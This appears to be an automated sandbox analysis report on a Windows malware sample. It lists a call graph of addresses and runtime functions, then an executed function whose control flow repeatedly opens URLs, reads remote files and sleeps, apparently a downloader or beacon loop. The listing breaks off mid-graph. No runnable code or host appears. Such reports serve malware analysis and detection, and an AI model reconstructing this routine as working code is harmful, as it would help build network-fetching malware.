2d9a615 GetLastError 20521->20524 20521->20525 20526 2d95d67 __set_osfhnd 59 API calls 20522->20526 20524->20525 20525->20503 20525->20507 20525->20518 20525->20521 20526->20505 20527 2d9ff4a 61 API calls __write_nolock 20527->20531 20528 2d9a101 WideCharToMultiByte 20528->20507 20529 2d9a13c WriteFile 20528->20529 20529->20500 20529->20531 20530 2da0f93 WriteConsoleW CreateFileW __putwch_nolock 20530->20531 20531->20500 20531->20507 20531->20527 20531->20528 20531->20530 20532 2d9a196 WriteFile 20531->20532 20549 2d9dc88 20531->20549 20532->20500 20532->20531 20565 2da0f6d RtlLeaveCriticalSection 20533->20565 20535 2d99e62 20535->20432 20539 2d98997 RtlLeaveCriticalSection 20536->20539 20538 2da0c53 20538->20466 20539->20538 20552 2da0e84 20540->20552 20542 2d9f842 20543 2d9f85b SetFilePointerEx 20542->20543 20544 2d9f84a 20542->20544 20545 2d9f873 GetLastError 20543->20545 20548 2d9f84f 20543->20548 20546 2d95d9b __set_osfhnd 59 API calls 20544->20546 20547 2d95d7a __dosmaperr 59 API calls 20545->20547 20546->20548 20547->20548 20548->20491 20550 2d9dc4e __isleadbyte_l 59 API calls 20549->20550 20551 2d9dc95 20550->20551 20551->20531 20553 2da0e8f 20552->20553 20554 2da0ea4 20552->20554 20555 2d95d67 __set_osfhnd 59 API calls 20553->20555 20557 2d95d67 __set_osfhnd 59 API calls 20554->20557 20559 2da0ec9 20554->20559 20556 2da0e94 20555->20556 20558 2d95d9b __set_osfhnd 59 API calls 20556->20558 20560 2da0ed3 20557->20560 20561 2da0e9c 20558->20561 20559->20542 20562 2d95d9b __set_osfhnd 59 API calls 20560->20562 20561->20542 20563 2da0edb 20562->20563 20564 2d94e35 __fclose_nolock 9 API calls 20563->20564 20564->20561 20565->20535 20569 2da0f6d RtlLeaveCriticalSection 20566->20569 20568 2d9f80e 20568->20451 20569->20568 20570->19101 20572 2d8e26d __EH_prolog 20571->20572 20573 2d93a8f _Allocate 60 API calls 20572->20573 20574 2d8e276 20573->20574 20575 2d81bfa RtlEnterCriticalSection 20574->20575 20577 2d8e484 20574->20577 20575->19106 20578 2d8e48e __EH_prolog 20577->20578 20581 2d826db RtlEnterCriticalSection 20578->20581 20580 2d8e4e4 20580->20575 20582 2d82728 CreateWaitableTimerA 20581->20582 20583 2d8277e 20581->20583 20585 2d82738 GetLastError 20582->20585 20586 2d8275b SetWaitableTimer 20582->20586 20584 2d827d5 RtlLeaveCriticalSection 20583->20584 20587 2d93a8f _Allocate 60 API calls 20583->20587 20584->20580 20588 2d90a50 Mailbox 68 API calls 20585->20588 20586->20583 20589 2d8278a 20587->20589 20590 2d82745 20588->20590 20592 2d93a8f _Allocate 60 API calls 20589->20592 20596 2d827c8 20589->20596 20591 2d81712 60 API calls 20590->20591 20591->20586 20594 2d827a9 20592->20594 20597 2d81cf8 CreateEventA 20594->20597 20625 2d87d36 20596->20625 20598 2d81d52 CreateEventA 20597->20598 20599 2d81d23 GetLastError 20597->20599 20600 2d81d6b GetLastError 20598->20600 20619 2d81d96 20598->20619 20602 2d81d33 20599->20602 20604 2d81d7b 20600->20604 20601 2d932fc __beginthreadex 275 API calls 20605 2d81db6 20601->20605 20603 2d90a50 Mailbox 68 API calls 20602->20603 20606 2d81d3c 20603->20606 20607 2d90a50 Mailbox 68 API calls 20604->20607 20608 2d81e0d 20605->20608 20609 2d81dc6 GetLastError 20605->20609 20610 2d81712 60 API calls 20606->20610 20611 2d81d84 20607->20611 20612 2d81e1d 20608->20612 20613 2d81e11 WaitForSingleObject CloseHandle 20608->20613 20614 2d81dd8 20609->20614 20615 2d81d4e 20610->20615 20616 2d81712 60 API calls 20611->20616 20612->20596 20613->20612 20617 2d81ddc CloseHandle 20614->20617 20618 2d81ddf 20614->20618 20615->20598 20616->20619 20617->20618 20620 2d81de9 CloseHandle 20618->20620 20621 2d81dee 20618->20621 20619->20601 20620->20621 20622 2d90a50 Mailbox 68 API calls 20621->20622 20623 2d81dfb 20622->20623 20624 2d81712 60 API calls 20623->20624 20624->20608 20626 2d87d52 20625->20626 20627 2d87d43 CloseHandle 20625->20627 20626->20584 20627->20626 20639 2d830ae WSASetLastError 20628->20639 20631 2d830ae 71 API calls 20632 2d83c90 20631->20632 20633 2d816ae 20632->20633 20634 2d816b8 __EH_prolog 20633->20634 20635 2d81701 20634->20635 20636 2d92413 std::exception::exception 59 API calls 20634->20636 20635->18980 20637 2d816dc 20636->20637 20655 2d8a3d5 20637->20655 20640 2d830ec WSAStringToAddressA 20639->20640 20641 2d830ce 20639->20641 20642 2d8a43c 69 API calls 20640->20642 20641->20640 20643 2d830d3 20641->20643 20644 2d83114 20642->20644 20645 2d90a50 Mailbox 68 API calls 20643->20645 20646 2d83154 20644->20646 20651 2d8311e _memcmp 20644->20651 20654 2d830d8 20645->20654 20647 2d83135 20646->20647 20652 2d90a50 Mailbox 68 API calls 20646->20652 20648 2d83193 20647->20648 20649 2d90a50 Mailbox 68 API calls 20647->20649 20653 2d90a50 Mailbox 68 API calls 20648->20653 20648->20654 20649->20648 20650 2d90a50 Mailbox 68 API calls 20650->20647 20651->20647 20651->20650 20652->20647 20653->20654 20654->20631 20654->20632 20656 2d8a3df __EH_prolog 20655->20656 20663 2d8c93a 20656->20663 20660 2d8a400 20661 2d9449a __CxxThrowException@8 RaiseException 20660->20661 20662 2d8a40e 20661->20662 20664 2d8b161 std::bad_exception::bad_exception 60 API calls 20663->20664 20665 2d8a3f2 20664->20665 20666 2d8c976 20665->20666 20667 2d8c980 __EH_prolog 20666->20667 20670 2d8b110 20667->20670 20669 2d8c9af Mailbox 20669->20660 20671 2d8b11a __EH_prolog 20670->20671 20672 2d8b161 std::bad_exception::bad_exception 60 API calls 20671->20672 20673 2d8b12b Mailbox 20672->20673 20673->20669 20675 2d83c20 __EH_prolog 20674->20675 20676 2d83c41 20675->20676 20677 2d923f7 std::bad_exception::bad_exception 59 API calls 20675->20677 20676->19121 20678 2d83c35 20677->20678 20679 2d8a58a 60 API calls 20678->20679 20679->20676 20681 2d83770 20680->20681 20682 2d83755 InterlockedCompareExchange 20680->20682 20683 2d90a50 Mailbox 68 API calls 20681->20683 20682->20681 20684 2d83765 20682->20684 20686 2d83779 20683->20686 20685 2d832ab 78 API calls 20684->20685 20685->20681 20687 2d829ee 76 API calls 20686->20687 20688 2d8378e 20687->20688 20688->19125 20718 2d935f0 20689->20718 20691 2d853c8 20691->19135 20692 2d93849 20691->20692 20693 2d93855 __lseeki64 20692->20693 20694 2d9388b 20693->20694 20695 2d93873 20693->20695 20697 2d93883 __lseeki64 20693->20697 20860 2d99732 20694->20860 20696 2d95d9b __set_osfhnd 59 API calls 20695->20696 20699 2d93878 20696->20699 20697->19137 20701 2d94e35 __fclose_nolock 9 API calls 20699->20701 20701->20697 20706 2d939d3 __lseeki64 20705->20706 20707 2d939ff 20706->20707 20708 2d939e7 20706->20708 20710 2d99732 __lock_file 60 API calls 20707->20710 20715 2d939f7 __lseeki64 20707->20715 20709 2d95d9b __set_osfhnd 59 API calls 20708->20709 20711 2d939ec 20709->20711 20712 2d93a11 20710->20712 20713 2d94e35 __fclose_nolock 9 API calls 20711->20713 20887 2d9395b 20712->20887 20713->20715 20715->19135 20721 2d935fc __lseeki64 20718->20721 20719 2d9360e 20720 2d95d9b __set_osfhnd 59 API calls 20719->20720 20722 2d93613 20720->20722 20721->20719 20723 2d9363b 20721->20723 20724 2d94e35 __fclose_nolock 9 API calls 20722->20724 20737 2d99808 20723->20737 20732 2d9361e __lseeki64 @_EH4_CallFilterFunc@8 20724->20732 20726 2d93640 20727 2d93649 20726->20727 20728 2d93656 20726->20728 20729 2d95d9b __set_osfhnd 59 API calls 20727->20729 20730 2d9367f 20728->20730 20731 2d9365f 20728->20731 20729->20732 20752 2d99927 20730->20752 20733 2d95d9b __set_osfhnd 59 API calls 20731->20733 20732->20691 20733->20732 20738 2d99814 __lseeki64 20737->20738 20739 2d9882d __lock 59 API calls 20738->20739 20750 2d99822 20739->20750 20740 2d99896 20782 2d9991e 20740->20782 20741 2d9989d 20742 2d989f4 __malloc_crt 59 API calls 20741->20742 20744 2d998a4 20742->20744 20744->20740 20746 2d9914c __mtinitlocks InitializeCriticalSectionAndSpinCount 20744->20746 20745 2d99913 __lseeki64 20745->20726 20749 2d998ca RtlEnterCriticalSection 20746->20749 20747 2d988b5 __mtinitlocknum 59 API calls 20747->20750 20749->20740 20750->20740 20750->20741 20750->20747 20772 2d99771 20750->20772 20777 2d997db 20750->20777 20761 2d99944 20752->20761 20753 2d99958 20754 2d95d9b __set_osfhnd 59 API calls 20753->20754 20756 2d9995d 20754->20756 20755 2d99aff 20755->20753 20758 2d99b5b 20755->20758 20757 2d94e35 __fclose_nolock 9 API calls 20756->20757 20759 2d9368a 20757->20759 20793 2da0770 20758->20793 20769 2d936ac 20759->20769 20761->20753 20761->20755 20787 2da078e 20761->20787 20766 2da08bd __openfile 59 API calls 20767 2d99b17 20766->20767 20767->20755 20768 2da08bd __openfile 59 API calls 20767->20768 20768->20755 20853 2d997a1 20769->20853 20771 2d936b2 20771->20732 20773 2d9977c 20772->20773 20774 2d99792 RtlEnterCriticalSection 20772->20774 20775 2d9882d __lock 59 API calls 20773->20775 20774->20750 20776 2d99785 20775->20776 20776->20750 20778 2d997e9 20777->20778 20779 2d997fc RtlLeaveCriticalSection 20777->20779 20785 2d98997 RtlLeaveCriticalSection 20778->20785 20779->20750 20781 2d997f9 20781->20750 20786 2d98997 RtlLeaveCriticalSection 20782->20786 20784 2d99925 20784->20745 20785->20781 20786->20784 20796 2da07a6 20787->20796 20789 2d99ac5 20789->20753 20790 2da08bd 20789->20790 20804 2da08d5 20790->20804 20792 2d99af8 20792->20755 20792->20766 20811 2da0659 20793->20811 20795 2da0789 20795->20759 20797 2da07bb 20796->20797 20798 2da07b4 20796->20798 20799 2d921bb _LocaleUpdate::_LocaleUpdate 59 API calls 20797->20799 20798->20789 20800 2da07c8 20799->20800 20800->20798 20801 2d95d9b __set_osfhnd 59 API calls 20800->20801 20802 2da07fb 20801->20802 20803 2d94e35 __fclose_nolock 9 API calls 20802->20803 20803->20798 20805 2d921bb _LocaleUpdate::_LocaleUpdate 59 API calls 20804->20805 20806 2da08e8 20805->20806 20807 2d95d9b __set_osfhnd 59 API calls 20806->20807 20810 2da08fd 20806->20810 20808 2da0929 20807->20808 20809 2d94e35 __fclose_nolock 9 API calls 20808->20809 20809->20810 20810->20792 20814 2da0665 __lseeki64 20811->20814 20812 2da067b 20813 2d95d9b __set_osfhnd 59 API calls 20812->20813 20815 2da0680 20813->20815 20814->20812 20816 2da06b1 20814->20816 20817 2d94e35 __fclose_nolock 9 API calls 20815->20817 20822 2da0722 20816->20822 20820 2da068a __lseeki64 20817->20820 20820->20795 20831 2d98176 20822->20831 20824 2da06cd 20827 2da06f6 20824->20827 20825 2da0736 20825->20824 20826 2d92eb4 _free 59 API calls 20825->20826 20826->20824 20828 2da06fc 20827->20828 20829 2da0720 20827->20829 20852 2da0f6d RtlLeaveCriticalSection 20828->20852 20829->20820 20832 2d98199 20831->20832 20833 2d98183 20831->20833 20832->20833 20835 2d981a0 ___crtIsPackagedApp 20832->20835 20834 2d95d9b __set_osfhnd 59 API calls 20833->20834 20836 2d98188 20834->20836 20838 2d981a9 AreFileApisANSI 20835->20838 20839 2d981b6 MultiByteToWideChar 20835->20839 20837 2d94e35 __fclose_nolock 9 API calls 20836->20837 20851 2d98192 20837->20851 20838->20839 20840 2d981b3 20838->20840 20841 2d981e1 20839->20841 20842 2d981d0 GetLastError 20839->20842 20840->20839 20844 2d989f4 __malloc_crt 59 API calls 20841->20844 20843 2d95d7a __dosmaperr 59 API calls 20842->20843 20843->20851 20845 2d981e9 20844->20845 20846 2d981f0 MultiByteToWideChar 20845->20846 20845->20851 20847 2d98206 GetLastError 20846->20847 20846->20851 20848 2d95d7a __dosmaperr 59 API calls 20847->20848 20849 2d98212 20848->20849 20850 2d92eb4 _free 59 API calls 20849->20850 20850->20851 20851->20825 20852->20829 20854 2d997cf RtlLeaveCriticalSection 20853->20854 20855 2d997b0 20853->20855 20854->20771 20855->20854 20856 2d997b7 20855->20856 20859 2d98997 RtlLeaveCriticalSection 20856->20859 20858 2d997cc 20858->20771 20859->20858 20861 2d99742 20860->20861 20862 2d99764 RtlEnterCriticalSection 20860->20862 20861->20862 20863 2d9974a 20861->20863 20864 2d93891 20862->20864 20865 2d9882d __lock 59 API calls 20863->20865 20866 2d936f0 20864->20866 20865->20864 20868 2d936ff 20866->20868 20875 2d9371d 20866->20875 20867 2d9370d 20869 2d95d9b __set_osfhnd 59 API calls 20867->20869 20868->20867 20872 2d93737 _memmove 20868->20872 20868->20875 20870 2d93712 20869->20870 20871 2d94e35 __fclose_nolock 9 API calls 20870->20871 20871->20875 20873 2d95e41 __flsbuf 79 API calls 20872->20873 20872->20875 20876 2d99d71 __fclose_nolock 59 API calls 20872->20876 20877 2d99d95 __write 79 API calls 20872->20877 20881 2d9a72f 20872->20881 20873->20872 20878 2d938c3 20875->20878 20876->20872 20877->20872 20879 2d997a1 __fsopen 2 API calls 20878->20879 20880 2d938c9 20879->20880 20880->20697 20882 2d9a742 20881->20882 20883 2d9a766 20881->20883 20882->20883 20884 2d99d71 __fclose_nolock 59 API calls 20882->20884 20883->20872 20885 2d9a75f 20884->20885 20886 2d99d95 __write 79 API calls 20885->20886 20886->20883 20888 2d9396a 20887->20888 20889 2d9397e 20887->20889 20890 2d95d9b __set_osfhnd 59 API calls 20888->20890 20892 2d9a72f __flush 79 API calls 20889->20892 20901 2d9397a 20889->20901 20891 2d9396f 20890->20891 20893 2d94e35 __fclose_nolock 9 API calls 20891->20893 20894 2d9398a 20892->20894 20893->20901 20906 2d9b1db 20894->20906 20897 2d99d71 __fclose_nolock 59 API calls 20898 2d93998 20897->20898 20910 2d9b066 20898->20910 20900 2d9399e 20900->20901 20902 2d92eb4 _free 59 API calls 20900->20902 20903 2d93a36 20901->20903 20902->20901 20904 2d997a1 __fsopen 2 API calls 20903->20904 20905 2d93a3c 20904->20905 20905->20715 20907 2d9b1e8 20906->20907 20909 2d93992 20906->20909 20908 2d92eb4 _free 59 API calls 20907->20908 20907->20909 20908->20909 20909->20897 20911 2d9b072 __lseeki64 20910->20911 20912 2d9b07f 20911->20912 20913 2d9b096 20911->20913 20914 2d95d67 __set_osfhnd 59 API calls 20912->20914 20915 2d9b121 20913->20915 20917 2d9b0a6 20913->20917 20916 2d9b084 20914->20916 20918 2d95d67 __set_osfhnd 59 API calls 20915->20918 20919 2d95d9b __set_osfhnd 59 API calls 20916->20919 20920 2d9b0ce 20917->20920 20921 2d9b0c4 20917->20921 20922 2d9b0c9 20918->20922 20932 2d9b08b __lseeki64 20919->20932 20923 2da0bc7 ___lock_fhandle 60 API calls 20920->20923 20924 2d95d67 __set_osfhnd 59 API calls 20921->20924 20925 2d95d9b __set_osfhnd 59 API calls 20922->20925 20926 2d9b0d4 20923->20926 20924->20922 20927 2d9b12d 20925->20927 20928 2d9b0f2 20926->20928 20929 2d9b0e7 20926->20929 20930 2d94e35 __fclose_nolock 9 API calls 20927->20930 20933 2d95d9b __set_osfhnd 59 API calls 20928->20933 20936 2d9b141 20929->20936 20930->20932 20932->20900 20934 2d9b0ed 20933->20934 20951 2d9b119 20934->20951 20937 2da0e84 __close_nolock 59 API calls 20936->20937 20939 2d9b14f 20937->20939 20938 2d9b1a5 20954 2da0dfe 20938->20954 20939->20938 20941 2da0e84 __close_nolock 59 API calls 20939->20941 20950 2d9b183 20939->20950 20944 2d9b17a 20941->20944 20942 2da0e84 __close_nolock 59 API calls 20945 2d9b18f CloseHandle 20942->20945 20948 2da0e84 __close_nolock 59 API calls 20944->20948 20945->20938 20949 2d9b19b GetLastError 20945->20949 20946 2d95d7a __dosmaperr 59 API calls 20947 2d9b1cf 20946->20947 20947->20934 20948->20950 20949->20938 20950->20938 20950->20942 20963 2da0f6d RtlLeaveCriticalSection 20951->20963 20953 2d9b11f 20953->20932 20955 2da0e6a 20954->20955 20956 2da0e0a 20954->20956 20957 2d95d9b __set_osfhnd 59 API calls 20955->20957 20956->20955 20959 2da0e33 20956->20959 20958 2da0e6f 20957->20958 20960 2d95d67 __set_osfhnd 59 API calls 20958->20960 20961 2d9b1ad 20959->20961 20962 2da0e55 SetStdHandle 20959->20962 20960->20961 20961->20946 20961->20947 20962->20961 20963->20953 20964 4024f6 20967 4024fa 20964->20967 20965 4024c6 20967->20965 20969 2d93c52 20967->20969 20970 2d93c5b 20969->20970 20971 2d93c60 20969->20971 20983 2d9b821 20970->20983 20975 2d93c75 20971->20975 20974 40b4fb 20976 2d93c81 __lseeki64 20975->20976 20980 2d93ccf ___DllMainCRTStartup 20976->20980 20982 2d93d2c __lseeki64 20976->20982 20987 2d93ae0 20976->20987 20978 2d93d09 20979 2d93ae0 __CRT_INIT@12 138 API calls 20978->20979 20978->20982 20979->20982 20980->20978 20981 2d93ae0 __CRT_INIT@12 138 API calls 20980->20981 20980->20982 20981->20978 20982->20974 20984 2d9b851 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 20983->20984 20985 2d9b844 20983->20985 20986 2d9b848 20984->20986 20985->20984 20985->20986 20986->20971 20988 2d93aec __lseeki64 20987->20988 20989 2d93b6e 20988->20989 20990 2d93af4 20988->20990 20991 2d93b72 20989->20991 20992 2d93bd7 20989->20992 21035 2d98126 GetProcessHeap 20990->21035 20997 2d93b93 20991->20997 21028 2d93afd __lseeki64 __CRT_INIT@12 20991->21028 21136 2d9839b 20991->21136 20995 2d93c3a 20992->20995 20996 2d93bdc 20992->20996 20994 2d93af9 20994->21028 21036 2d95cd4 20994->21036 20999 2d95b64 __freeptd 59 API calls 20995->20999 20995->21028 20998 2d9910b __freeptd TlsGetValue 20996->20998 21139 2d98272 RtlDecodePointer 20997->21139 21002 2d93be7 20998->21002 20999->21028 21006 2d989ac __calloc_crt 59 API calls 21002->21006 21002->21028 21004 2d93b09 __RTC_Initialize 21012 2d93b19 GetCommandLineA 21004->21012 21004->21028 21008 2d93bf8 21006->21008 21007 2d93ba9 __CRT_INIT@12 21163 2d93bc2 21007->21163 21013 2d9912a __freeptd TlsSetValue 21008->21013 21008->21028 21009 2d9b4bf __ioterm 60 API calls 21011 2d93ba4 21009->21011 21014 2d95d4a __mtterm 62 API calls 21011->21014 21057 2d9b8bd GetEnvironmentStringsW 21012->21057 21016 2d93c10 21013->21016 21014->21007 21018 2d93c2e 21016->21018 21019 2d93c16 21016->21019 21022 2d92eb4 _free 59 API calls 21018->21022 21021 2d95c21 __initptd 59 API calls 21019->21021 21024 2d93c1e GetCurrentThreadId 21021->21024 21022->21028 21023 2d93b33 21025 2d93b37 21023->21025 21089 2d9b511 21023->21089 21024->21028 21122 2d95d4a 21025->21122 21028->20980 21030 2d93b57 21030->21028 21131 2d9b4bf 21030->21131 21035->20994 21167 2d98442 RtlEncodePointer 21036->21167 21038 2d95cd9 21172 2d9895e 21038->21172 21041 2d95ce2 21042 2d95d4a __mtterm 62 API calls 21041->21042 21044 2d95ce7 21042->21044 21044->21004 21046 2d95cff 21047 2d989ac __calloc_crt 59 API calls 21046->21047 21048 2d95d0c 21047->21048 21049 2d95d41 21048->21049 21050 2d9912a __freeptd TlsSetValue 21048->21050 21051 2d95d4a __mtterm 62 API calls 21049->21051 21052 2d95d20 21050->21052 21053 2d95d46 21051->21053 21052->21049 21054 2d95d26 21052->21054 21053->21004 21055 2d95c21 __initptd 59 API calls 21054->21055 21056 2d95d2e GetCurrentThreadId 21055->21056 21056->21004 21058 2d9b8d0 WideCharToMultiByte 21057->21058 21059 2d93b29 21057->21059 21061 2d9b93a FreeEnvironmentStringsW 21058->21061 21062 2d9b903 21058->21062 21070 2d9b20b 21059->21070 21061->21059 21063 2d989f4 __malloc_crt 59 API calls 21062->21063 21064 2d9b909 21063->21064 21064->21061 21065 2d9b910 WideCharToMultiByte 21064->21065 21066 2d9b92f FreeEnvironmentStringsW 21065->21066 21067 2d9b926 21065->21067 21066->21059 21068 2d92eb4 _free 59 API calls 21067->21068 21069 2d9b92c 21068->21069 21069->21066 21071 2d9b217 __lseeki64 21070->21071 21072 2d9882d __lock 59 API calls 21071->21072 21073 2d9b21e 21072->21073 21074 2d989ac __calloc_crt 59 API calls 21073->21074 21075 2d9b22f 21074->21075 21076 2d9b29a GetStartupInfoW 21075->21076 21077 2d9b23a __lseeki64 @_EH4_CallFilterFunc@8 21075->21077 21083 2d9b3de 21076->21083 21085 2d9b2af 21076->21085 21077->21023 21078 2d9b4a6 21180 2d9b4b6 21078->21180 21080 2d989ac __calloc_crt 59 API calls 21080->21085 21081 2d9b42b GetStdHandle 21081->21083 21082 2d9b2fd 21082->21083 21086 2d9b331 GetFileType 21082->21086 21087 2d9914c __mtinitlocks InitializeCriticalSectionAndSpinCount 21082->21087 21083->21078 21083->21081 21084 2d9b43e GetFileType 21083->21084 21088 2d9914c __mtinitlocks InitializeCriticalSectionAndSpinCount 21083->21088 21084->21083 21085->21080 21085->21082 21085->21083 21086->21082 21087->21082 21088->21083 21090 2d9b51f 21089->21090 21091 2d9b524 GetModuleFileNameA 21089->21091 21190 2d951ca 21090->21190 21093 2d9b551 21091->21093 21184 2d9b5c4 21093->21184 21095 2d93b43 21095->21030 21100 2d9b740 21095->21100 21097 2d989f4 __malloc_crt 59 API calls 21098 2d9b58a 21097->21098 21098->21095 21099 2d9b5c4 _parse_cmdline 59 API calls 21098->21099 21099->21095 21101 2d9b749 21100->21101 21103 2d9b74e _strlen 21100->21103 21102 2d951ca ___initmbctable 71 API calls 21101->21102 21102->21103 21104 2d989ac __calloc_crt 59 API calls 21103->21104 21107 2d93b4c 21103->21107 21112 2d9b784 _strlen 21104->21112 21105 2d9b7d6 21106 2d92eb4 _free 59 API calls 21105->21106 21106->21107 21107->21030 21116 2d983aa 21107->21116 21108 2d989ac __calloc_crt 59 API calls 21108->21112 21109 2d9b7fd 21110 2d92eb4 _free 59 API calls 21109->21110 21110->21107 21112->21105 21112->21107 21112->21108 21112->21109 21113 2d9b814 21112->21113 21304 2d96bfc 21112->21304 21117 2d983b6 __IsNonwritableInCurrentImage 21116->21117 21123 2d95d54 21122->21123 21128 2d95d5a 21122->21128 21316 2d990ec 21123->21316 21125 2d98877 RtlDeleteCriticalSection 21127 2d92eb4 _free 59 API calls 21125->21127 21126 2d98893 21129 2d9889f RtlDeleteCriticalSection 21126->21129 21130 2d988b2 21126->21130 21127->21128 21128->21125 21128->21126 21129->21126 21130->21028 21135 2d9b4c6 21131->21135 21132 2d9b50e 21132->21025 21133 2d92eb4 _free 59 API calls 21133->21135 21134 2d9b4df RtlDeleteCriticalSection 21134->21135 21135->21132 21135->21133 21135->21134 21137 2d984e4 _doexit 59 API calls 21136->21137 21138 2d983a6 21137->21138 21138->20997 21140 2d9828c 21139->21140 21141 2d9829e 21139->21141 21140->21141 21143 2d92eb4 _free 59 API calls 21140->21143 21142 2d92eb4 _free 59 API calls 21141->21142 21144 2d982ab 21142->21144 21143->21140 21145 2d982cf 21144->21145 21147 2d92eb4 _free 59 API calls 21144->21147 21146 2d92eb4 _free 59 API calls 21145->21146 21148 2d982db 21146->21148 21147->21144 21149 2d92eb4 _free 59 API calls 21148->21149 21150 2d982ec 21149->21150 21151 2d92eb4 _free 59 API calls 21150->21151 21152 2d982f7 21151->21152 21153 2d9831c RtlEncodePointer 21152->21153 21156 2d92eb4 _free 59 API calls 21152->21156 21154 2d98337 21153->21154 21155 2d98331 21153->21155 21158 2d9834d 21154->21158 21160 2d92eb4 _free 59 API calls 21154->21160 21157 2d92eb4 _free 59 API calls 21155->21157 21159 2d9831b 21156->21159 21157->21154 21161 2d93b98 21158->21161 21162 2d92eb4 _free 59 API calls 21158->21162 21159->21153 21160->21158 21161->21007 21161->21009 21162->21161 21164 2d93bd4 21163->21164 21165 2d93bc6 21163->21165 21164->21028 21165->21164 21166 2d95d4a __mtterm 62 API calls 21165->21166 21166->21164 21168 2d98453 __init_pointers __initp_misc_winsig 21167->21168 21179 2d9394a RtlEncodePointer 21168->21179 21170 2d9846b __init_pointers 21171 2d991ba 34 API calls 21170->21171 21171->21038 21173 2d9896a 21172->21173 21174 2d9914c __mtinitlocks InitializeCriticalSectionAndSpinCount 21173->21174 21175 2d95cde 21173->21175 21174->21173 21175->21041 21176 2d990ce 21175->21176 21177 2d95cf4 21176->21177 21178 2d990e5 TlsAlloc 21176->21178 21177->21041 21177->21046 21179->21170 21183 2d98997 RtlLeaveCriticalSection 21180->21183 21182 2d9b4bd 21182->21077 21183->21182 21186 2d9b5e6 21184->21186 21189 2d9b64a 21186->21189 21194 2da1516 21186->21194 21187 2d9b567 21187->21095 21187->21097 21188 2da1516 _parse_cmdline 59 API calls 21188->21189 21189->21187 21189->21188 21191 2d951d3 21190->21191 21192 2d951da 21190->21192 21200 2d95527 21191->21200 21192->21091 21197 2da14bc 21194->21197 21198 2d921bb _LocaleUpdate::_LocaleUpdate 59 API calls 21197->21198 21199 2da14ce 21198->21199 21199->21186 21201 2d95533 __lseeki64 21200->21201 21202 2d95b9a CallUnexpected 59 API calls 21201->21202 21203 2d9553b 21202->21203 21204 2d95481 _LocaleUpdate::_LocaleUpdate 59 API calls 21203->21204 21205 2d95545 21204->21205 21225 2d95222 21205->21225 21226 2d921bb _LocaleUpdate::_LocaleUpdate 59 API calls 21225->21226 21227 2d95232 21226->21227 21305 2d96c15 21304->21305 21306 2d96c07 21304->21306 21306->21305 21317 2d990ff 21316->21317 21318 2d99103 TlsFree 21316->21318 21317->21128 21318->21128 21319 40b578 lstrcmpiW 21320 40b14c 21319->21320 21321 2de71e7 21322 2debb98 WriteFile 21321->21322 21324 2e024d7 21322->21324 21325 40b67c RegCloseKey 21326 40b682 21325->21326

                                                                                Executed Functions

                                                                                Function 02D872AB Relevance: 95.2, APIs: 41, Strings: 13, Instructions: 659networksleepfileCOMMON
                                                                                Download Yara Rule

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 2d872ab-2d872c3 InternetOpenA 1 2d87389-2d8738f 0->1 2 2d872c9-2d8731d InternetSetOptionA * 3 call 2d94a30 0->2 4 2d873ab-2d873b9 1->4 5 2d87391-2d87397 1->5 8 2d87322-2d87340 InternetOpenUrlA 2->8 6 2d873bf-2d873e3 call 2d94a30 call 2d8439c 4->6 7 2d866f4-2d866f6 4->7 9 2d87399-2d8739b 5->9 10 2d8739d-2d873aa call 2d853ec 5->10 6->7 31 2d873e9-2d87417 RtlEnterCriticalSection RtlLeaveCriticalSection call 2d9227c 6->31 13 2d866f8-2d866fd 7->13 14 2d866ff-2d86701 7->14 15 2d87382-2d87383 InternetCloseHandle 8->15 16 2d87342 8->16 9->4 10->4 19 2d86708 Sleep 13->19 21 2d8670e-2d86742 RtlEnterCriticalSection RtlLeaveCriticalSection 14->21 22 2d86703 14->22 15->1 20 2d87346-2d8736c InternetReadFile 16->20 19->21 24 2d8736e-2d87375 20->24 25 2d87377-2d8737e InternetCloseHandle 20->25 26 2d86792 21->26 27 2d86744-2d86750 21->27 22->19 24->20 25->15 29 2d86796 26->29 27->26 30 2d86752-2d8675f 27->30 29->0 32 2d86761-2d86765 30->32 33 2d86767-2d86768 30->33 38 2d87419-2d8742b call 2d9227c 31->38 39 2d8746d-2d87488 call 2d9227c 31->39 34 2d8676c-2d86790 call 2d94a30 * 2 32->34 33->34 34->29 38->39 49 2d8742d-2d8743f call 2d9227c 38->49 47 2d8748e-2d87490 39->47 48 2d87742-2d87754 call 2d9227c 39->48 47->48 50 2d87496-2d87548 call 2d92eec RtlEnterCriticalSection RtlLeaveCriticalSection call 2d94a30 * 5 call 2d8439c * 2 47->50 58 2d8779d-2d877a6 call 2d9227c 48->58 59 2d87756-2d87758 48->59 49->39 56 2d87441-2d87453 call 2d9227c 49->56 115 2d8754a-2d8754c 50->115 116 2d87585 50->116 56->39 70 2d87455-2d87467 call 2d9227c 56->70 65 2d877ab-2d877af 58->65 59->58 63 2d8775a-2d87798 call 2d94a30 RtlEnterCriticalSection RtlLeaveCriticalSection 59->63 63->7 71 2d877d0-2d877e2 call 2d9227c 65->71 72 2d877b1-2d877bf call 2d861f5 call 2d86303 65->72 70->7 70->39 83 2d877e8-2d877ea 71->83 84 2d87b00-2d87b12 call 2d9227c 71->84 86 2d877c4-2d877cb call 2d8640e 72->86 83->84 88 2d877f0-2d87807 call 2d8439c 83->88 84->7 96 2d87b18-2d87b46 call 2d92eec call 2d94a30 call 2d8439c 84->96 86->7 88->7 97 2d8780d-2d878db call 2d92358 call 2d81ba7 88->97 117 2d87b48-2d87b4a call 2d8534d 96->117 118 2d87b4f-2d87b56 call 2d92eb4 96->118 113 2d878dd call 2d8143f 97->113 114 2d878e2-2d87903 RtlEnterCriticalSection 97->114 113->114 121 2d8790f-2d87945 RtlLeaveCriticalSection call 2d83c67 call 2d83d7e 114->121 122 2d87905-2d8790c 114->122 115->116 123 2d8754e-2d87560 call 2d9227c 115->123 119 2d87589-2d8758e call 2d92eec 116->119 117->118 118->7 129 2d87593-2d875b7 call 2d94a30 call 2d8439c 119->129 138 2d8794a-2d87967 call 2d8826e 121->138 122->121 123->116 133 2d87562-2d87583 call 2d8439c 123->133 146 2d875f8-2d87601 call 2d92eb4 129->146 147 2d875b9-2d875c8 call 2d93529 129->147 133->119 142 2d8796c-2d87973 138->142 144 2d87979-2d879b3 call 2d8a658 142->144 145 2d87ae7-2d87afb call 2d88f36 142->145 152 2d879b8-2d879c1 144->152 145->7 158 2d87738-2d8773b 146->158 159 2d87607-2d8761f call 2d93a8f 146->159 147->146 160 2d875ca 147->160 156 